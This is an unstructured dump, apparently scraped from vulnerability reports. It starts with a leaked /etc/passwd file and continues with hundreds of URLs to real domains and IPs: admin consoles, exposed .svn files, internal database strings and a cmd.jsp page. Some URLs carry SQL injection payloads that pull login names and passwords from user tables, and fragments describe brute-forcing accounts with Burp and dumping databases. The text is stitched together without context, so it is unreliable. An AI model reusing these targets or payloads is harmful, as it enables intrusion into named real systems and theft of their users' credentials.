nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin qpidd:x:497:496:Owner Daemons:/var/lib/qpidd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin pulse:x:496:494:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin mcoam:x:500:500::/home/mcoam:/bin/bash mysql:x:501:501::/home/mysql:/bin/bash tss:x:59:59:Account daemon:/dev/null:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin https://mail.cdrcb.com/owa/ https://116.228.131.218/pos/ http://www.flyertea.com/forum.php?mod=viewthread&tid=421376&page=1#pid7041508 http://cofcoc.com/中粮食博会的网站 http://www.sinochemoil.com/esbclient/layout/Export.php存在 http://www.sdwscgs.com:9080/zdwz/cityurl.do?type=toselectall&bj=2 http://www.sdwscgs.com:9080/zdwz/cityurl.do?type=toselectall&bj=1 http://www.wochacha.com:80/ www.wochacha.com http://119.6.100.172:8080/dlp/userReg/pushSetup.do?setupName=asdasd http://gitlab.aimeizhuyi.com/zhaoming/search_build_index/blob/master/src/config/config.php http://gitlab.aimeizhuyi.com/zhaoming/search_build_index/blob/master/src/config.online/config.php http://www.chinartc.com/ http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=911 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=970 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=1036&name=%D6%EA%D4%CB%BC%AF%CD%C5 
http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=994&name=%B8%BE%D3%D7%B1%A3%BD%A1%D4%BA http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=954&name=%B9%FA%D7%CA%B9%AB%CB%BE http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=956&name=%B5%B5%B0%B8%BE%D6 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=943 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=990&name=%B5%E7%C1%A6%B9%AB%CB%BE http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=979&name=%C8%FD%BA%D3%D5%F2 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=1004&name=%BD%BB%BE%AF%B4%F3%B6%D3 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=994&name=%B8%BE%D3%D7%B1%A3%BD%A1%D4%BA http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=911&xxfl=0103&pagenum=1&biaotiname=%D5%FE%B8%AE%D0%C5%CF%A2%B9%AB%BF%AA%D6%C6%B6%C8 http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=970&xxfl=0201&pagenum=1&biaotiname=%B5%D8%C7%F8%A3%A8%D0%D0%D2%B5%A3%A9%BD%E9%C9%DC http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=1036&xxfl=0102&pagenum=1&biaotiname=%D5%FE%B8%AE%D0%C5%CF%A2%B9%AB%BF%AA%C4%BF%C2%BC http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=994&xxfl=0105&pagenum=1&biaotiname=%BB%FA%B9%B9%BD%E9%C9%DC http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=954&xxfl=0109&pagenum=1&biaotiname=%D5%FE%B8%AE%D0%C5%CF%A2%C6%E4%CB%FC%C4%DA%C8%DD http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=994&xxfl=0108&pagenum=1&biaotiname=%C4%DA%C9%E8%BB%FA%B9%B9%BC%B0%D6%B0%D4%F0 http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=1004&xxfl=0108&pagenum=1&biaotiname=%C4%DA%C9%E8%BB%FA%B9%B9%BC%B0%D6%B0%D4%F0 http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=979&xxfl=0106&pagenum=1&biaotiname=%BB%FA%B9%B9%D6%B0%C4%DC http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 
http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://cndms.ztems.com/p49a3_try_web/faq/AllFAQ.aspx http://125.88.171.20/FrameAction/index.do http://yfpt.csc.com.cn:8080/km/ site:yfpt.csc.com.cn http://yfpt.csc.com.cn:8080/km/listRight.dhtml http://yfpt.csc.com.cn:8080/km/report/viewReport.dhtml?reportId=4b90f843-6c11-4a00-b30c-9f8da12bfbb6&reportTypeId=1503%27 http://www.capchem.com/hr/1 www.jiankongbao.com http://www.lurongdai.com http://wooyun.org/bugs/wooyun-2015-0131253 http://spark.m.xunlei.com:8080/login.html http://pai.xunlei.com:8080/login.html http://**.**.**.**/extWeb/i.do cn:8383 http://mls.iwjw.com/houseTask/agent/showTask?taskId=440000 
http://uumconsole.iwjwagent.com/)就很简单了,1000个账号,放到burp跑一下,近30个账号密码为123456 http://math.sysu.edu.cn/main/TeachersForce/TeaList.aspx?duty=1 ldap://124.172.223.236:389 http://m.bk.17173.com/question/detail?askid=1003296&classid=1009568&from=mobile http://220.169.61.143/console/ http://220.169.61.143/system/warning.jsp jdbc:sqlserver://172.16.96.34:1433 http://open.haodai.com:80/ http://film.unikaixin.com/customer/exchange_explain.do http://film.unikaixin.com/cmd.jsp http://221.237.153.40:8081/ http://221.237.153.40:8081 http://url/lan/admin_getLisence http://www.ycjsy.com/tb/show.asp?id=20478 http://www.huaop2p.com/content.aspx?id=533249066410,如图所示: http://www.huaop2p.com/content.aspx?id=533249066410 http://sqlmap.org www.huaop2p.com http://www.huaop2p.com/content.aspx?id=533249066410 http://www.huaop2p.com/content.aspx?id=533249066410 http://huiyi.csdn.net/m/ticket/personal/detail?orderid=2014022709773 http://huiyi.csdn.net/m/ticket/personal/detail?orderid=2014050845082 http://huiyi.csdn.net/m/ticket/personal/detail?orderid=2014051396900 http://huiyi.csdn.net/m/ticket/personal/detail?orderid=2014042443820 http://huiyi.csdn.net/m/ticket/personal/detail?orderid=2014051332633 http://115.85.207.58:*7*0*0*1/co*ns*ol*e/ http://115.85.207.58:*7*0*0*1/GsyhEntBank http://115.85.207.58:*7*0*0*1/system/warning.jsp jdbc:oracle:thin:@10.3.96.1:1521/orcl http://www.hljpost.com/ycyhbosom/login/index.jsp www.hljpost.com http://10.15.44.72/discuz/forum.php?mod=guide&view=newthread&mobile=2 http://articles.imp3.net/search.php?x=0&y=0&keywords=test http://www.ejbang.com/weixin/demo/tocreatedemocleanorder.do http://**.**.**.**/html/OurService/GroupService/zhengfugonggongfuwu/ http://**.**.**.**/module/2425_2.html http://**.**.**.**:8800/ServiceAction/com.velcro.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://**.**.**.**:8082/ServiceAction/com.velcro.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER 
http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://**.**.**.**:8080/ServiceAction/com.velcro.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://**.**.**.**/vmain/login.jsp http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER%20where%20rownum%3C10 https://116.228.218.6/AuditSec/login?op=logout http://intel.hiall.com.cn/intel.sql http://119.60.5.37:8081/health2/login http://221.226.149.17:8080/kingdee/disk/add_folder.jsp?current_file_id=1&file_name=1 http://221.226.149.17:8080/kingdee/disk/save_file_property.jsp?file_name=1&file_id=1 http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://221.4.245.218:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://220.189.244.202:8080/kingdee/login/loginpage.jsp http://222.133.44.10:8080/kingdee/login/loginpage.jsp http://223.95.183.6:8080/kingdee/login/loginpage.jsp http://61.190.20.51/kingdee/login/loginpage.jsp http://60.194.110.187/kingdee/login/loginpage.jsp http://oa.roen.cn/kingdee/login/loginpage.jsp http://**.**.**.**/.svn/entries http://**.**.**.**/.svn/entries http://203.187.184.11 http://mall.bydauto.com.cn/index.php/customer/address/new/ http://t.cn/RLqypdb http://**.**.**.**/extmail/cgi/zxadmin.cgi http://kanqiu.hupu.com/april/sample?from=aprilDetail http://kanqiu.hupu.com/april/news?nid=4875875, http://kanqiu.hupu.com/april/news?nid=4875872 http://creative.pptv.com/share/list?cat=0 https://1**.**4.**8.141:4430/cgi-bh/login.cgi http://www.app-echo.com/user/edit http://qiandan.jiaji.com/SignScan/logins.jsp http://wt.jiaji.com 
http://www.flyertea.com/credit/index.php/Index/index.html?condition=-0&code=1771&name= http://www.taozfu.com/product/index/1?Br http://addon.discuz.com/?@dc_mall.plugin http://**.**.**.**/sys/sysMenu/list.do http://**.**.**.**/consult/consultStudent/studentProfileList.do?schoolDateType=2 http://oa.http://**.**.**.**/sys/sysPositionAuthority/list.do http://**.**.**.**/teach/teachGroup/list.do http://**.**.**.**/market/marketSchool/list.do AddressController.java/*view*/ www.feicuidai.com https://github.com/haolinks/haolinks/blob/master/feicuidai/WEB-INF/classes/config/db/jdbc.properties http://dv.56.com/hongren/?do=AjaxVideoData&order=1 http://171.111.157.177:80/union/search.do?unionName=CasterJs http://219.143.252.178/,存在sql注入漏洞,通过注入可以脱库获取到800多个表的信息,可以获取到大量用户和密码等敏感信息。 http://sis.minshenglife.com/logon/menu.jsp?userCode=null%27%20oR%2011%3D11%20anD%20%271%27%3D%271&Ip=null&nodecode= inurl:index_xxi.asp?cz= http://**.**.**.**:8086/sfxjs_zdzy.asp?lm=%B5%E7%D7%D3%BC%BC%CA%F5%D3%A6%D3%C3%D7%A8%D2%B5&bh=409 http://**.**.**.**/tsims/sfxjs_zdzy.asp?lm=%B5%E7%D7%D3%BC%BC%CA%F5%D3%A6%D3%C3%D7%A8%D2%B5&bh=409 http://**.**.**.**/tsims/sfxjs_zdzy.asp?lm=%B5%E7%D7%D3%BC%BC%CA%F5%D3%A6%D3%C3%D7%A8%D2%B5&bh=409 http://**.**.**.**/tsims/sfxjs_zdzy.asp?lm=%B5%E7%D7%D3%BC%BC%CA%F5%D3%A6%D3%C3%D7%A8%D2%B5&bh=409 http://**.**.**.**/tsims/sfxjs_zdzy.asp?lm=%B5%E7%D7%D3%BC%BC%CA%F5%D3%A6%D3%C3%D7%A8%D2%B5&bh=409 http://**.**.**.**:8003/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**:8086/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**/tsims/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**/tsims/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**/tsims/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**/tsims/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**/tsims/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 
http://**.**.**.**:8003/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://**.**.**.**:8086/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://**.**.**.**/tsims/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://**.**.**.**/tsims/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://**.**.**.**/tsims/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://**.**.**.**/tsims/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://**.**.**.**/tsims/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://120.204.233.155/index http://pay.lvye.cn/trade/view/351619 https://itunes.apple.com/cn/app/id717831204?mt=8 http://shijue.me/api/accounts/login http://www.dfyl-luxgen.com/index.php/lifehouse index.php/api/searchgetdelaers?time=0.40741090243682265 www.dfyl-luxgen.com http://www.dfyl-luxgen.com http://www.ddianle.com/ http://push.ddianle.com:9876/pushandroid/resources/index.html?cId=7&cnickName=%E5%AE%A2%E6%9C%8D006 http://push.ddianle.com:9876/pushandroid/resources/index.html?cId=7&cnickName=%E5%AE%A2%E6%9C%8D006 http://push.ddianle.com:9876/pushandroid/home.jsp http://push.ddianle.com:9876/pushandroid/resources/index.html?cId=7&cnickName=%E5%AE%A2%E6%9C%8D006 http://hspcn.net:8000/home/Account/ net:8000/home/Account/ValidateLogOn data:usercode=fdsf&password=sfsd http://hb.gjdx.cc/gjdx/signon.shtml http://58.60.230.217:8080/default.html http://58.60.230.217:81/ http://auto.mop.com/tag.jsp?p=1&t=1 http://219.143.252.76/cn/web/user_login.aspx http://user.chinaiiss.com/index.php?do=pm&type=makepm&touid=256427 http://59.41.9.152/siteadmin/ListCompanyInfo.aspx http://59.41.9.152/siteadmin/AproDeclare2.aspx?pid=1259&state=0&paid=3854 http://59.41.9.152/WebIM.aspx http://**.**.**.**/bugs/wooyun-2015-0116232而发 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://crm.xinhucaifu.com/login.jsp http://www.mycos.com.cn/admin/index.php/Public/login http://www.cdttjt.com/search/ 
http://www.ddianle.com/wp-admin/ http://event21.wanmei.com/shenmo/shenmocreate/list.action?flag=10&type=2 http://se-office.ruc.edu.cn/index.php?do=list&channelid=19393 http://z.xywy.com/doc/yjdr/ask.php?doctoruser=yjdr http://z.xywy.com/doc/yjdr/ask.php?doctoruser=yjdr http://exam.daojia.com使用的是tcexam系统。 cn:8188/admin/ http://admin.data.auto.ifeng.com/admin/login.do http://comment.aili.com/index.php?m=comments&a=getlist&sid=1&oid=&uname= http://219.142.180.32:7001/console http://219.142.180.32:7001/key/j.jsp www.lotour.com http://219.143.252.170/seeyon/index.jsp http://www.gzjt.gov.cn http://jrwork.eastcom.com/brm/portalbcs/framework.do?action=index&&action=login https://report.ztgame.com/.svn/entries svn://10.10.102.179:443 svn://10.10.102.179:443 svn:special svn:externals svn:needs-lock https://mail.itestin.com https://exmail.qq.com http://**.**.**.**:8090/lslp/DragFlow/GuangZhou/BussGuid/AddTable.aspx http://**.**.**.**:8080/lslp/DragFlow/GuangZhou/BussGuid/AddTable.aspx http://**.**.**.**:8083/lslp/DragFlow/GuangZhou/BussGuid/AddTable.aspx Url:mickey.tudou.com http://person.sac.net.cn/login.action# http://person.sac.net.cn/pages/registration/sac-publicity-report.html http://**.**.**.**/zhidao/question.aspx?pid=18 http://**.**.** http://joycitycrmws.cofco.com:8081/ws_member.asmx?op=CRM_VipSales com:8081 http://202.201.163.2:8080/shelf/curriculum.php?type=name&q=%E8%88%9E%E8%B9%88%E5%AD%A6&submit=%E6%A3%80%E7%B4%A2 http://library.djtu.edu.cn/webphp/shelf/curriculum.php?type=name&q=%E8%88%9E%E8%B9%88%E5%AD%A6&submit=%E6%A3%80%E7%B4%A2 http://fpsale.pywm.com.cn/ http://callcenter.dongfeng-nissan.com.cn/login.aspx http://callcenter.dongfeng-nissan.com.cn/login.aspx http://www.allianz.cn/zh/disclosure_items/financial_information/turn.action http://www.allianz.cn/br.jsp http://**.**.**.**/sns/index.php?app=msgroup&mod=Index&act=index&gid=6199-6198 https://cavpn.ecaic.com http://10.1.67.222/中软的it运维系统弱口令服务器信息泄露 http://122.96.93.126/ 
http://www.chinagreentown.com/bocadmin/index.php?login http://www.xintai.com/web/user/resetPwd/index.jsp http://www.waawo.cn/media-news.php?id=37 http://www.whaac.gov.cn:8080/BusinessRegistration/BR_ProjectList.aspx?page=1&procode= http://www.cfdonline.org.cn/OutPortal_CFD//BusinessRegistration/BR_ProjectList.aspx?page=1&procode= http://www.rcsp.cn/BusinessRegistration/BR_ProjectList.aspx?page=1&procode= http://222.135.78.34/BusinessRegistration/BR_ProjectList.aspx?page=1&procode= http://www.rczw.gov.cn/BusinessRegistration/BR_ProjectList.aspx?page=1&procode= http://www.whaac.gov.cn:8080/ProJectControl/LS_ProjectList.aspx?page=1&procode= http://www.cfdonline.org.cn/OutPortal_CFD//ProJectControl/LS_ProjectList.aspx?page=1&procode= http://www.rczw.gov.cn/ProJectControl/LS_ProjectList.aspx?page=1&procode= http://www.rcsp.cn/ProJectControl/LS_ProjectList.aspx?page=1&procode= http://222.135.78.34/ProJectControl/LS_ProjectList.aspx?page=1&procode= http://www.rcsp.cn/ViewSource/FujianDownLoad.aspx?id=1 http://www.whaac.gov.cn:8080/ViewSource/FujianDownLoad.aspx?id=1 http://222.135.78.34/ViewSource/FujianDownLoad.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/ViewSource/FujianDownLoad.aspx?id=1 http://www.rczw.gov.cn/ViewSource/FujianDownLoad.aspx?id=1 http://www.rcsp.cn/ViewSource/PrintDownLoad.aspx?id=1 http://www.whaac.gov.cn:8080/ViewSource/PrintDownLoad.aspx?id=1 http://222.135.78.34/ViewSource/PrintDownLoad.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/ViewSource/PrintDownLoad.aspx?id=1 http://www.rczw.gov.cn/ViewSource/PrintDownLoad.aspx?id=1 http://www.rcsp.cn//SecondPages/ItemObjectList.aspx?id=1 http://www.whaac.gov.cn:8080/SecondPages/ItemObjectList.aspx?id=1 http://222.135.78.34/SecondPages/ItemObjectList.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/SecondPages/ItemObjectList.aspx?id=1 http://www.rczw.gov.cn/SecondPages/ItemObjectList.aspx?id=1 http://www.rcsp.cn//SecondPages/ItemDetail.aspx?id=1 
http://www.whaac.gov.cn:8080//SecondPages/ItemDetail.aspx?id=1 http://222.135.78.34//SecondPages/ItemDetail.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD//SecondPages/ItemDetail.aspx?id=1 http://www.rczw.gov.cn//SecondPages/ItemDetail.aspx?id=1 http://www.rcsp.cn//SecondPages/itemsearchlist.aspx?id=1 http://www.whaac.gov.cn:8080//SecondPages/itemsearchlist.aspx?id=1 http://222.135.78.34//SecondPages/itemsearchlist.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD//SecondPages/itemsearchlist.aspx?id=1 http://www.rczw.gov.cn//SecondPages/itemsearchlist.aspx?id=1 http://www.rcsp.cn/Qiyezhuce/Huanyingguanlin.aspx?id=1 http://www.whaac.gov.cn:8080/Qiyezhuce/Huanyingguanlin.aspx?id=1 http://222.135.78.34/Qiyezhuce/Huanyingguanlin.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/Qiyezhuce/Huanyingguanlin.aspx?id=1 http://www.rczw.gov.cn/Qiyezhuce/Huanyingguanlin.aspx?id=1 http://www.rcsp.cn/Qiyezhuce/Yicixinggaozhi.aspx?id=1 http://www.whaac.gov.cn:8080/Qiyezhuce/Yicixinggaozhi.aspx?id=1 http://222.135.78.34/Qiyezhuce/Yicixinggaozhi.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/Qiyezhuce/Yicixinggaozhi.aspx?id=1 http://www.rczw.gov.cn/Qiyezhuce/Yicixinggaozhi.aspx?id=1 http://www.rcsp.cn/login/itemList.aspx?id=1 http://www.whaac.gov.cn:8080/login/itemList.aspx?id=1 http://222.135.78.34/login/itemList.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/login/itemList.aspx?id=1 http://www.rczw.gov.cn/login/itemList.aspx?id=1 http://www.rcsp.cn//FormPage/AttDownLoad.aspx?id=1 http://www.whaac.gov.cn:8080//FormPage/AttDownLoad.aspx?id=1 http://222.135.78.34//FormPage/AttDownLoad.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD//FormPage/AttDownLoad.aspx?id=1 http://www.rczw.gov.cn//FormPage/AttDownLoad.aspx?id=1 http://www.rcsp.cn/FormControl/AttDownLoad.aspx?id=1 http://www.whaac.gov.cn:8080/FormControl/AttDownLoad.aspx?id=1 http://222.135.78.34/FormControl/AttDownLoad.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/FormControl/AttDownLoad.aspx?id=1 
http://www.rczw.gov.cn/FormControl/AttDownLoad.aspx?id=1 http://www.rcsp.cn/FormControl/PubFormPage.aspx?formId=1 http://www.whaac.gov.cn:8080/FormControl/PubFormPage.aspx?formId=1 http://222.135.78.34/FormControl/PubFormPage.aspx?formId=1 http://www.cfdonline.org.cn/OutPortal_CFD/FormControl/PubFormPage.aspx?formId=1 http://www.rczw.gov.cn/FormControl/PubFormPage.aspx?formId=1 http://www.rcsp.cn/EmbedPage/itemsearchlist1.aspx?id=1 http://www.whaac.gov.cn:8080/EmbedPage/itemsearchlist1.aspx?id=1 http://222.135.78.34/EmbedPage/itemsearchlist1.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/EmbedPage/itemsearchlist1.aspx?id=1 http://www.rczw.gov.cn/EmbedPage/itemsearchlist1.aspx?id=1 http://221.2.149.28:8090/zjcs/SecondPages/ItemDetail.aspx?id=1 http://www.whaac.gov.cn:8090/zjcs/SecondPages/ItemDetail.aspx?id=1 http://www.rszwfwzx.gov.cn:8080/zjcs/SecondPages/ItemDetail.aspx?id=1 http://www.wdaac.cn/zjcs/SecondPages/ItemDetail.aspx?id=1 http://222.135.78.37:8084/zjcs/SecondPages/ItemDetail.aspx?id=1 http://221.2.149.28:8090/zjcs/SecondPages/itemsearchlist.aspx?id=1 http://www.whaac.gov.cn:8090/zjcs/SecondPages/itemsearchlist.aspx?id=1 http://www.rszwfwzx.gov.cn:8080/zjcs/SecondPages/itemsearchlist.aspx?id=1 http://www.wdaac.cn/zjcs/SecondPages/itemsearchlist.aspx?id=1 http://222.135.78.37:8084/zjcs/SecondPages/itemsearchlist.aspx?id=1 http://221.2.149.28:8090/zjcs/SecondPages/ItemObjectList.aspx?id=1 http://www.whaac.gov.cn:8090/zjcs/SecondPages/ItemObjectList.aspx?id=1 http://www.rszwfwzx.gov.cn:8080/zjcs/SecondPages/ItemObjectList.aspx?id=1 http://www.wdaac.cn/zjcs/SecondPages/ItemObjectList.aspx?id=1 http://222.135.78.37:8084/zjcs/SecondPages/ItemObjectList.aspx?id=1 http://221.2.149.28:8090/zjcs/login/ItemList.aspx?id=1 http://www.whaac.gov.cn:8090/zjcs/login/ItemList.aspx?id=1 http://www.rszwfwzx.gov.cn:8080/zjcs/login/ItemList.aspx?id=1 http://www.wdaac.cn/zjcs/login/ItemList.aspx?id=1 http://222.135.78.37:8084/zjcs/login/ItemList.aspx?id=1 
http://221.2.149.28:8090/zjcs/issue/similarPaid.aspx?zhongjieID=ZJJG_2015030914101257487 http://www.whaac.gov.cn:8090/zjcs/issue/similarPaid.aspx?zhongjieID=ZJJG_2015030914101257487 http://www.rszwfwzx.gov.cn:8080/zjcs/issue/similarPaid.aspx?zhongjieID=ZJJG_2015030914101257487 http://www.wdaac.cn/zjcs/issue/similarPaid.aspx?zhongjieID=ZJJG_2015030914101257487 http://222.135.78.37:8084/zjcs/issue/similarPaid.aspx?zhongjieID=ZJJG_2015030914101257487 http://221.2.149.28:8090/zjcs/issue/similarItemList.aspx?dic_code=SYLDKXXBG http://www.whaac.gov.cn:8090/zjcs/issue/similarItemList.aspx?dic_code=SYLDKXXBG http://www.rszwfwzx.gov.cn:8080/zjcs/issue/similarItemList.aspx?dic_code=SYLDKXXBG http://www.wdaac.cn/zjcs/issue/similarItemList.aspx?dic_code=SYLDKXXBG http://222.135.78.37:8084/zjcs/issue/similarItemList.aspx?dic_code=SYLDKXXBG http://222.135.78.37:8084/zjcs/issue/similarPaidList1.aspx?item_id=1ed1f0c7-e89f-4ace-b952-89edbf207624 http://www.whaac.gov.cn:8090/zjcs/issue/similarPaidList1.aspx?item_id=1ed1f0c7-e89f-4ace-b952-89edbf207624 http://www.rszwfwzx.gov.cn:8080/zjcs/issue/similarPaidList1.aspx?item_id=1ed1f0c7-e89f-4ace-b952-89edbf207624 http://www.wdaac.cn/zjcs/issue/similarPaidList1.aspx?item_id=1ed1f0c7-e89f-4ace-b952-89edbf207624 http://222.135.78.37:8084/zjcs/issue/similarPaidList1.aspx?item_id=1ed1f0c7-e89f-4ace-b952-89edbf207624 http://222.135.78.37:8084/zjcs/SecondPages/infodetail_YWGG.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.whaac.gov.cn:8090/zjcs/SecondPages/infodetail_YWGG.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.rszwfwzx.gov.cn:8080/zjcs/SecondPages/infodetail_YWGG.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.wdaac.cn/zjcs/SecondPages/infodetail_YWGG.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://222.135.78.37:8084/zjcs/SecondPages/infodetail_YWGG.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 
http://222.135.78.37:8084/zjcs/SecondPages/infodetail_CJXX.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.whaac.gov.cn:8090/zjcs/SecondPages/infodetail_CJXX.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.rszwfwzx.gov.cn:8080/zjcs/SecondPages/infodetail_CJXX.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.wdaac.cn/zjcs/SecondPages/infodetail_CJXX.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://222.135.78.37:8084/zjcs/SecondPages/infodetail_CJXX.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.rcsp.cn/OutNetChannel/SubItemList.aspx http://www.whaac.gov.cn:8080/OutNetChannel/SubItemList.aspx http://222.135.78.34/OutNetChannel/SubItemList.aspx http://www.cfdonline.org.cn/OutPortal_CFD/OutNetChannel/SubItemList.aspx http://www.rczw.gov.cn/OutNetChannel/SubItemList.aspx http://**.**.**/cispconfig http://www.hzxf12345.gov.cn/appellate/appellate.do?act=commCx http://cip.dongfeng-nissan.com.cn/Login.aspx http://cip.dongfeng-nissan.com.cn/Login.aspx?action=DoLogin https://npass.dongfeng-nissan.com.cn/manage/password/showForgotPassword.htm?username= http://shfw.easthope.cn/backPwd/cubasLogin.htm http://shfw.easthope.cn/css.jsp http://wx.233.com/search/study/?mid=13346&teacher=576 http://223.6.251.5/pssysb.aspx site:lipei.e-dicc.com.cn http://lipei.e-dicc.com.cn/autoclaim/jsp/picture/picture_single_view.jsp?filep=/nfs_vol4/image/2015/05/28/40287ece4d56fdf9014d98b1acd018e3/big/2015-5-28_21124125.JPG http://lipei.e-dicc.com.cn/autoclaim/jsp/picture/picture_single_view.jsp?filep=/nfs/image/2011/11/29/40287ece33b617c40133d8b59fdb0b05/big/201111290822699.JPG http://lipei.e-dicc.com.cn/autoclaim/jsp/picture/picture_single_view.jsp?filep=/nfs/image/2011/11/29/40287ece33b617c40133d8b59fdb0b05/big/201111290322770.JPG 
